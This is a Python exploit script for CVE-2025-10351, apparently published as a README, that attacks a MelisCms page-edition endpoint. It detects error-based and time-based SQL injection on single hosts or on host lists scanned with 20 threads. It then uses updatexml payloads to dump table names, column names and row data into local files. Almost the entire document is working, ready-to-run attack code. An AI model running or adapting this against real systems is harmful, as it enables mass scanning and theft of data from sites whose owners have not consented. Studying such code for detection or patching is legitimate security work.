README.md
Rendering markdown...
#!/usr/bin/env python3
#===========================================================================================#
# _______ ________ ___ ___ ___ _____ __ ___ ____ _____ __ #
# / ____\ \ / / ____| |__ \ / _ \__ \| ____| /_ |/ _ \___ \| ____/_ | #
# | | \ \ / /| |__ ______ ) | | | | ) | |__ ______| | | | |__) | |__ | | #
# | | \ \/ / | __|______/ /| | | |/ /|___ \______| | | | |__ <|___ \ | | #
# | |____ \ / | |____ / /_| |_| / /_ ___) | | | |_| |__) |___) || | #
# \_____| \/ |______| |____|\___/____|____/ |_|\___/____/|____/ |_| #
# #
# #
# Made with love for the hacking community <3 Manuel Iván San Martín Castillo #
#===========================================================================================#
import requests
import argparse
import html
import time
import urllib3
import concurrent.futures
from colorama import Fore, Style, init
from prettytable import PrettyTable
from urllib.parse import urlparse, urlsplit, parse_qs, urlunsplit
from bs4 import BeautifulSoup
# Silence urllib3's InsecureRequestWarning, which would otherwise be printed
# for every request made with certificate verification turned off.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Initialise colorama; autoreset=True resets colours after each print call.
init(autoreset=True)
# Module-wide flag read by make_petition to print request/response details.
# The __main__ block switches it to True when --debug is given.
DEBUG_REQ = False
def remove_html_tags(text):
    """Return the text content of *text* with all HTML markup stripped.

    Parsing is delegated to BeautifulSoup using its ``html.parser`` backend.
    """
    soup = BeautifulSoup(text, "html.parser")
    return soup.get_text()
def is_time_based_sqli(session, url, payload_true, payload_false, sleep_time, threshold=0.9):
    """Compare response times of a delaying and a non-delaying request.

    Args:
        session: ``requests.Session`` used for both requests.
        url: Base URL that each payload is appended to.
        payload_true: Payload expected to delay the response by ``sleep_time``.
        payload_false: Control payload expected to return without delay.
        sleep_time: Delay in seconds that ``payload_true`` asks for.
        threshold: Fraction of ``sleep_time`` the measured extra delay must
            reach to count as a positive result.

    Returns:
        True when the delayed request took at least ``sleep_time * threshold``
        seconds longer than the control request, or when only the delayed
        request timed out. False otherwise, including when the control
        request itself fails or times out.
    """
    request_timeout = sleep_time + 5

    def _timed_get(payload):
        # A monotonic clock is used so wall-clock adjustments cannot skew the
        # measured duration.
        started = time.monotonic()
        session.get(url + requests.utils.requote_uri(payload), timeout=request_timeout)
        return time.monotonic() - started

    try:
        false_duration = _timed_get(payload_false)
    except Exception:
        # Without a usable baseline there is nothing to compare against; a
        # slow or unreachable host must not be reported as a positive.
        return False

    try:
        true_duration = _timed_get(payload_true)
    except requests.exceptions.Timeout:
        # The baseline answered in time but the delayed request did not.
        return True
    except Exception:
        return False

    delay = true_duration - false_duration
    return delay >= (sleep_time * threshold)
def check_endpoint(host, port, endpoint, cookie, proxy_str=None, disable_verify=False):
    """Check one target endpoint and print the verdict.

    A ``requests.Session`` carries the headers, cookie, proxy and TLS settings
    through every request made for this target. The session is closed when
    the check finishes, so its pooled connections are released.

    Args:
        host: Scheme and host, e.g. ``https://www.example.com``.
        port: Port number (string or int), appended as ``host:port``.
        endpoint: Path and query ending in ``=``; payloads are spliced in
            after each ``=``.
        cookie: PHPSESSID value, or an empty value for none.
        proxy_str: Optional proxy URL applied to both http and https.
        disable_verify: When true, TLS certificate verification is off.

    Returns:
        None. Results and errors are reported on stdout. Reads the global
        ``args`` for ``url_list``, ``sleep``, ``all_tables`` and ``table``.
    """
    base_url = f"{host}:{port}"
    endpoint_with_quote = endpoint.replace("=", "='")
    url_with_quote = f"{base_url}/{endpoint_with_quote}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                      "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
    }
    cookies = {"PHPSESSID": cookie} if cookie else {}
    try:
        # The context manager guarantees session.close() on every exit path,
        # including the early returns and the recursive re-check below.
        with requests.Session() as session:
            session.headers.update(headers)
            if cookies:
                session.cookies.update(cookies)
            # Apply the explicit proxy and stop requests from reading
            # proxy settings from the environment.
            if proxy_str:
                session.proxies = {"http": proxy_str, "https": proxy_str}
                session.trust_env = False
            session.verify = not disable_verify

            # Initial request follows redirects so a login page can be spotted.
            response = session.get(url_with_quote, allow_redirects=True, timeout=5)

            # A redirect (non-empty history or a changed final URL) is taken
            # as "authentication required". Skipped in list mode.
            if not args.url_list and (response.history or (response.url and response.url != url_with_quote)):
                print(f"{base_url} {Fore.YELLOW}[AUTH REQUIRED]{Style.RESET_ALL}")
                new_cookie = ask_for_cookies()
                if new_cookie and len(new_cookie) >= 8:
                    return check_endpoint(host, port, endpoint, new_cookie, proxy_str, disable_verify)
                elif new_cookie:
                    print(f"{base_url} {Fore.BLUE}[INVALID COOKIE]{Style.RESET_ALL}")
                return

            # Error-based detection: a MySQL syntax error or any mention of
            # "xpath" in the response body.
            if "You have an error in your SQL syntax" in response.text or "xpath" in response.text.lower():
                print(f"{base_url} {Fore.RED}[VULNERABLE]{Style.RESET_ALL} Error-Based SQLi")
                if args.all_tables or args.table:
                    ask_to_exploit(f"{base_url}/{endpoint}", session)
            else:
                base = f"{base_url}/"
                # Payload that asks the database to sleep.
                payload_true = endpoint.replace(
                    "=",
                    f"=1 AND (SELECT 1 FROM (SELECT(SLEEP({int(args.sleep)})))test)"
                )
                # Control payload with the same shape but no delay.
                payload_false = endpoint.replace(
                    "=",
                    "=1 AND (SELECT 1 FROM (SELECT(1))test)"
                )
                if is_time_based_sqli(session, base, payload_true, payload_false, args.sleep):
                    print(f"{base_url} {Fore.RED}[VULNERABLE]{Style.RESET_ALL} Time-Based SQLi")
                    print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} WARNING: Time-Based exploitation is not supported.")
                else:
                    print(f"{base_url} {Fore.GREEN}[NOT VULNERABLE]{Style.RESET_ALL}")
    # SSLError is handled before ConnectionError so TLS failures get their own message.
    except requests.exceptions.SSLError:
        print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} SSL Error")
    except requests.exceptions.ConnectionError:
        print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} Connection Error")
    except Exception as e:
        print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} General Error: {e}")
# Ports for which a scheme-less "host:port" entry is assumed to speak TLS.
_TLS_PORTS = frozenset({443, 8443, 9443, 10443})


def _parse_target_line(line):
    """Convert one list entry into ``(scheme://host, port)`` tuples, or [] if unusable."""
    has_scheme = "://" in line
    try:
        # Prefixing "//" makes urlparse treat a bare "host[:port]" as a netloc.
        parsed = urlparse(line if has_scheme else f"//{line}")
        host = parsed.hostname
        port = parsed.port
    except ValueError:
        # urlparse raises for a non-numeric or out-of-range port and for a
        # malformed IPv6 literal; one bad line must not abort the whole list.
        print(f"[{Fore.YELLOW}!{Style.RESET_ALL}] Skipping malformed target: {line}")
        return []
    if not host:
        return []
    if ":" in host:
        # .hostname strips the brackets of an IPv6 literal; restore them so
        # the rebuilt URL stays valid once ":port" is appended.
        host = f"[{host}]"

    if has_scheme:
        scheme = parsed.scheme.lower() if parsed.scheme else "http"
        if not port:
            port = 443 if scheme == "https" else 80
        return [(f"{scheme}://{host}", str(port))]
    if port:
        scheme = "https" if port in _TLS_PORTS else "http"
        return [(f"{scheme}://{host}", str(port))]
    # No scheme and no port: try both default endpoints.
    return [(f"https://{host}", "443"), (f"http://{host}", "80")]


def process_url_list(file_path, endpoint, cookie, proxy_str=None, disable_verify=False):
    """Read targets from a file and check each one concurrently.

    Accepted line formats are a full URL with scheme, ``host``, ``host:port``,
    or the same with an IP address. Blank lines and lines starting with ``#``
    are ignored, malformed lines are skipped with a warning, and duplicate
    targets are checked only once.

    Args:
        file_path: Path of the text file with one target per line.
        endpoint: Endpoint passed through to ``check_endpoint``.
        cookie: PHPSESSID value passed through to ``check_endpoint``.
        proxy_str: Optional proxy URL passed through to ``check_endpoint``.
        disable_verify: TLS verification flag passed through to ``check_endpoint``.

    Returns:
        None. Progress and errors are printed to stdout.
    """
    try:
        seen = set()
        targets_all = []
        with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
            for raw_line in f:
                line = raw_line.strip()
                # Skip empty lines and comments.
                if not line or line.startswith("#"):
                    continue
                for target in _parse_target_line(line):
                    if target in seen:
                        continue
                    seen.add(target)
                    targets_all.append(target)

        if not targets_all:
            print(f"[{Fore.YELLOW}!{Style.RESET_ALL}] URL list is empty or no valid targets found.")
            return

        # Threads suit this I/O-bound work. Raise or lower the worker count as
        # needed; 20 usually performs well without overloading anything.
        max_workers = 20
        with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as ex:
            futures = [
                ex.submit(check_endpoint, full_host, port, endpoint, cookie, proxy_str, disable_verify)
                for (full_host, port) in targets_all
            ]
            # Consume results so exceptions raised in workers are reported.
            for fut in concurrent.futures.as_completed(futures):
                try:
                    fut.result()
                except Exception as e:
                    print(f"[{Fore.YELLOW}X{Style.RESET_ALL}] Worker error: {e}")
    except Exception as e:
        print(f"[{Fore.RED}ERROR{Style.RESET_ALL}] Failed to process URL list: {e}")
def ask_to_exploit(url, session):
    """Prompt for confirmation and, if given, start extraction on *url*.

    The same *session* is handed on so follow-up requests reuse its cookies
    and settings. The sleep time is read from the global ``args``.
    """
    prompt = f"[{Fore.MAGENTA}?{Style.RESET_ALL}] Do you want to attempt exploitation? (y/n): "
    answer = input(prompt).strip().lower()
    if answer not in ('y', 'yes'):
        print(f"[{Fore.BLUE}X{Style.RESET_ALL}] Exploitation aborted.")
        return
    exploit_error_based(url, args.sleep, session)
def ask_for_cookies():
    """Offer a re-check with a cookie and return the entered PHPSESSID value.

    Returns:
        The stripped cookie string typed by the user, or None when the user
        declines the re-check.
    """
    prompt = f"[{Fore.MAGENTA}?{Style.RESET_ALL}] Recheck with cookies? (y/n): "
    answer = input(prompt).strip().lower()
    if answer not in ('y', 'yes'):
        return None
    cookie_value = input(f"[{Fore.YELLOW}-{Style.RESET_ALL}] Enter PHPSESSID cookie: ")
    return cookie_value.strip()
def make_petition(session, url, payload_template, sleep_time, output_file, data_type):
    """
    Send a payload template repeatedly and collect the values found in the responses.

    For each OFFSET from 0 to 99 the template is formatted with a growing
    ITERATOR (1, 32, 63, ...) and requested. Fragments found on response
    lines that mention "xpath" are concatenated into one value per offset.

    Args:
        session: requests session used for every request.
        url: Target URL; the payload is sent either as a query parameter or
            appended to this URL (see the resolution logic below).
        payload_template: String with ``{ITERATOR}`` and ``{OFFSET}`` placeholders.
        sleep_time: Seconds to pause after each successful request.
        output_file: File that receives one value per line; it is truncated
            first. Falsy or the string 'null' (any case) disables file output.
        data_type: Label used in the "Extracted ..." progress message.

    Returns:
        List of the non-empty values collected, in offset order.
    """
    # Start from an empty output file so old results are not mixed in.
    if output_file and output_file.lower() != 'null':
        open(output_file, 'w').close()
    extracted_rows = []
    # Consecutive requests without data; initialised once, so the count
    # carries over from one offset to the next.
    no_data_counter = 0
    parsed = urlsplit(url)
    param_name = None
    base_for_request = url
    if parsed.query:
        # parse_qs drops parameters with blank values, so a query such as
        # "name=" yields an empty dict and param_name stays None.
        qs = parse_qs(parsed.query)
        if qs:
            param_name = list(qs.keys())[0]
            base_for_request = urlunsplit((parsed.scheme, parsed.netloc, parsed.path, '', ''))
    else:
        # No query string: if the URL ends with "=", use the last path
        # segment before it as the parameter name.
        if '=' in url and url.rstrip().endswith('='):
            idx = url.rfind('=')
            last_part = url[:idx].split('/')[-1]
            param_name = last_part if last_part else 'id'
            base_for_request = url[:idx+1].rstrip('=')
    # With a parameter name the payload goes through params=; otherwise it is
    # appended to the URL.
    use_params = bool(param_name)
    for offset in range(0, 100):
        CHAIN = ""  # value accumulated for this offset
        ITERATOR = 1  # start position passed to the template
        ended = False  # not read anywhere in this function
        data_fragment = ""
        while True:
            payload = payload_template.format(ITERATOR=ITERATOR, OFFSET=offset)
            try:
                if use_params:
                    params = {param_name: payload}
                    if DEBUG_REQ:
                        print(f"[DEBUG] GET {base_for_request} params={params}")
                    response = session.get(base_for_request, params=params, allow_redirects=False, timeout=3)
                else:
                    exploit_url = url + requests.utils.requote_uri(payload)
                    if DEBUG_REQ:
                        print(f"[DEBUG] GET {exploit_url}")
                    response = session.get(exploit_url, allow_redirects=True, timeout=3)
                if DEBUG_REQ:
                    print(f"[DEBUG] status={response.status_code} url={response.url}")
                    snippet = response.text[:800].replace("\n", "\\n")
                    print(f"[DEBUG] resp snippet: {snippet}")
                # Strip markup and decode HTML entities before scanning lines.
                response_text = html.unescape(remove_html_tags(response.text))
                lines = response_text.splitlines()
                found_data = False
                for line in lines:
                    if "xpath" in line.lower():
                        # Prefer the text after the first "~", cut at the
                        # first "'" if one follows.
                        if "~" in line:
                            extracted = line.split("~")
                            if len(extracted) > 1:
                                data_fragment = extracted[1].split("'")[0] if "'" in extracted[1] else extracted[1]
                        elif ":" in line:
                            # No "~": fall back to the text after the last colon.
                            data_fragment = line.split(":")[-1].strip()
                        else:
                            data_fragment = line.strip()
                        if data_fragment:
                            found_data = True
                            CHAIN += data_fragment
                            if DEBUG_REQ:
                                print(f"[DEBUG] extracted fragment: '{data_fragment}'")
                if found_data:
                    no_data_counter = 0
                else:
                    no_data_counter += 1
                    # Five consecutive empty responses end this offset.
                    if no_data_counter >= 5:
                        break
                # Advance by 31 for the next chunk.
                # NOTE(review): presumably 31 rather than 32 because the
                # leading "~" uses one character of the returned text - confirm.
                ITERATOR += 31
                time.sleep(sleep_time)
            except requests.RequestException as e:
                # Any request failure ends this offset; values gathered so far are kept.
                if DEBUG_REQ:
                    print(f"[DEBUG] request exception: {e}")
                break
        # Keep a lone fragment even if nothing was accumulated in CHAIN.
        if not CHAIN and data_fragment:
            CHAIN = data_fragment
        if CHAIN:
            extracted_rows.append(CHAIN)
            print(f"[{Fore.GREEN}+{Style.RESET_ALL}] Extracted {data_type}: {Fore.BLUE}{CHAIN}{Style.RESET_ALL}")
            if output_file and output_file.lower() != 'null':
                with open(output_file, 'a') as f:
                    f.write(CHAIN + '\n')
    print(f"\n[{Fore.RED}X{Style.RESET_ALL}] Finished extraction process.\n")
    return extracted_rows
def display_table(data_list, columns, output_file):
    """Print the collected rows as a table and optionally append it to a file.

    Each entry of *data_list* is split on ``||``; entries whose number of
    cells differs from the number of *columns* are left out. The rendered
    table is appended to *output_file* unless that is falsy or 'null'.
    """
    print(f"[{Fore.GREEN}+{Style.RESET_ALL}] Table with data")
    table = PrettyTable()
    table.field_names = columns

    final_index = len(data_list) - 1
    for position, raw_row in enumerate(data_list):
        cells = raw_row.split("||")
        if len(cells) != len(columns):
            continue
        table.add_row(cells)
        # Separate rows with a divider, except after the final entry.
        if position < final_index:
            table.add_divider()

    print(table)

    wants_file = output_file and output_file.lower() != 'null'
    if wants_file:
        with open(output_file, 'a') as handle:
            handle.write(str(table) + '\n')
def extract_tables(session, url, sleep_time, tables_filename):
    """List the table names of the current database via make_petition.

    Results are printed and written to *tables_filename* by make_petition;
    this function itself returns None.
    """
    template_parts = [
        "1 OR updatexml(null, concat(0x7e, ",
        "(SELECT substring(table_name, {ITERATOR}, 32) ",
        "FROM information_schema.tables WHERE table_schema=database() ",
        "LIMIT 1 OFFSET {OFFSET}), 0x7e), null)",
    ]
    payload_template = "".join(template_parts)
    make_petition(session, url, payload_template, sleep_time, tables_filename, 'table')
def extract_columns(session, url, sleep_time, table_name):
    """Return the column names make_petition collects for *table_name*.

    No output file is written ('null' is passed as the file name).
    """
    print(f"{Fore.BLUE}i{Style.RESET_ALL} Extracting columns from table: {table_name}")
    # Plain concatenation keeps {ITERATOR}/{OFFSET} as literal placeholders
    # for make_petition to fill in.
    payload_template = "".join([
        "1 OR updatexml(null, concat(0x7e, ",
        "(SELECT substring(column_name, {ITERATOR}, 32) ",
        "FROM information_schema.columns WHERE table_name='" + table_name + "' ",
        "LIMIT 1 OFFSET {OFFSET}), 0x7e), null)",
    ])
    column_names = make_petition(session, url, payload_template, sleep_time, 'null', 'column')
    return column_names
def extract_data_from_columns(session, url, sleep_time, table_name, columns):
    """Collect the given comma-separated *columns* of *table_name* and show them.

    Values of one row are joined with ``||`` (0x7c7c) in the payload, written
    to ``<table_name>_data.txt`` by make_petition, and rendered with
    display_table when anything was collected.
    """
    target = urlparse(url)
    origin = f"{target.scheme}://{target.netloc}"
    results_file = f"{table_name}_data.txt"

    column_list = columns.split(',')
    joined_columns = ", 0x7c7c, ".join(column_list)
    # Plain concatenation keeps {ITERATOR}/{OFFSET} as literal placeholders
    # for make_petition to fill in.
    payload_template = "".join([
        "1 OR updatexml(null, concat(0x7e, ",
        "(SELECT substring(concat(" + joined_columns + "), {ITERATOR}, 32) ",
        "FROM " + table_name + " LIMIT 1 OFFSET {OFFSET}), 0x7e), null)",
    ])

    print(f"{Fore.BLUE}i{Style.RESET_ALL} Extracting data from {origin}")
    rows = make_petition(session, url, payload_template, sleep_time, results_file, 'data')
    if not rows:
        return
    display_table(rows, column_list, results_file)
def exploit_error_based(url, sleep_time, session):
    """Dispatch to the extraction routine selected by the command-line flags.

    Reads the global ``args``: ``all_tables`` takes precedence; otherwise
    ``table`` combined with ``all_columns`` / ``columns`` decides what is
    collected. The *session* comes from check_endpoint.
    """
    print(f"{Fore.BLUE}i{Style.RESET_ALL} Attempting Error-Based SQL Injection on {url}")
    print(f"{Fore.YELLOW}!{Style.RESET_ALL} WARNING: Large data may not extract properly")

    if args.all_tables:
        extract_tables(session, url, sleep_time, "tables_extracted.txt")
        return
    if not args.table:
        return

    table = args.table
    if args.all_columns:
        # Discover the columns first, then collect their data.
        found_columns = extract_columns(session, url, sleep_time, table)
        if found_columns:
            extract_data_from_columns(session, url, sleep_time, table, ",".join(found_columns))
    elif args.columns:
        extract_data_from_columns(session, url, sleep_time, table, args.columns)
    else:
        extract_columns(session, url, sleep_time, table)
if __name__ == "__main__":
    # Command-line interface. -h is registered by hand because add_help is off.
    usage_message = "CVE-2025-10351.py -u <URL> -p <PORT> | -l <URL_LIST> [-s <SLEEP_TIME>] [-at] [-t <TABLE>] [-ac]"
    parser = argparse.ArgumentParser(
        usage=usage_message,
        add_help=False,
        description="Script to check and exploit CVE-2025-10351.",
    )
    # Target selection
    parser.add_argument("-u", "--url", help="Target URL (e.g. https://www.example.com)")
    parser.add_argument("-p", "--port", help="Port (e.g. 80, used only with --url)")
    parser.add_argument("-l", "--url-list", help="File with URLs to check (one per line)")
    # Timing
    parser.add_argument("-s", "--sleep", type=float, default=1.0, help="Sleep time (default: 1s)")
    # Extraction options
    parser.add_argument("-at", "--all-tables", action='store_true', help="Extract all tables.")
    parser.add_argument("-t", "--table", help="Specify a table name to extract columns.")
    parser.add_argument("-ac", "--all-columns", action='store_true', help="Extract all column data (requires -t).")
    parser.add_argument("-c", "--columns", help="Specify columns to extract (comma-separated).")
    # Connection options
    parser.add_argument("--proxy", help="Proxy URL (no env). Example: http://127.0.0.1:8080")
    parser.add_argument("--insecure", action="store_true", help="Disable TLS verification (useful for intercepting HTTPS with Burp)")
    parser.add_argument("--cookie", help="PHPSESSID cookie (optional). Example: abc123")
    parser.add_argument("--debug", action="store_true", help="Enable verbose request/response debug for extraction")
    parser.add_argument("-h", "--help", action='help', default=argparse.SUPPRESS, help="Show help message.")

    # `args` stays a module-level global: the functions above read it directly.
    args = parser.parse_args()

    # Turn on request/response tracing in make_petition when asked to.
    if args.debug:
        DEBUG_REQ = True

    endpoint = "melis/MelisCms/PageEdition/getTinyTemplates?idPage="
    # The cookie is optional; an empty string means "none".
    cookie_arg = args.cookie if args.cookie else ""

    single_target = args.url and args.port
    if single_target:
        check_endpoint(args.url, args.port, endpoint, cookie_arg, args.proxy, args.insecure)
    elif args.url_list:
        process_url_list(args.url_list, endpoint, cookie_arg, args.proxy, args.insecure)
    else:
        # Neither a URL+port pair nor a list file was supplied.
        parser.print_help()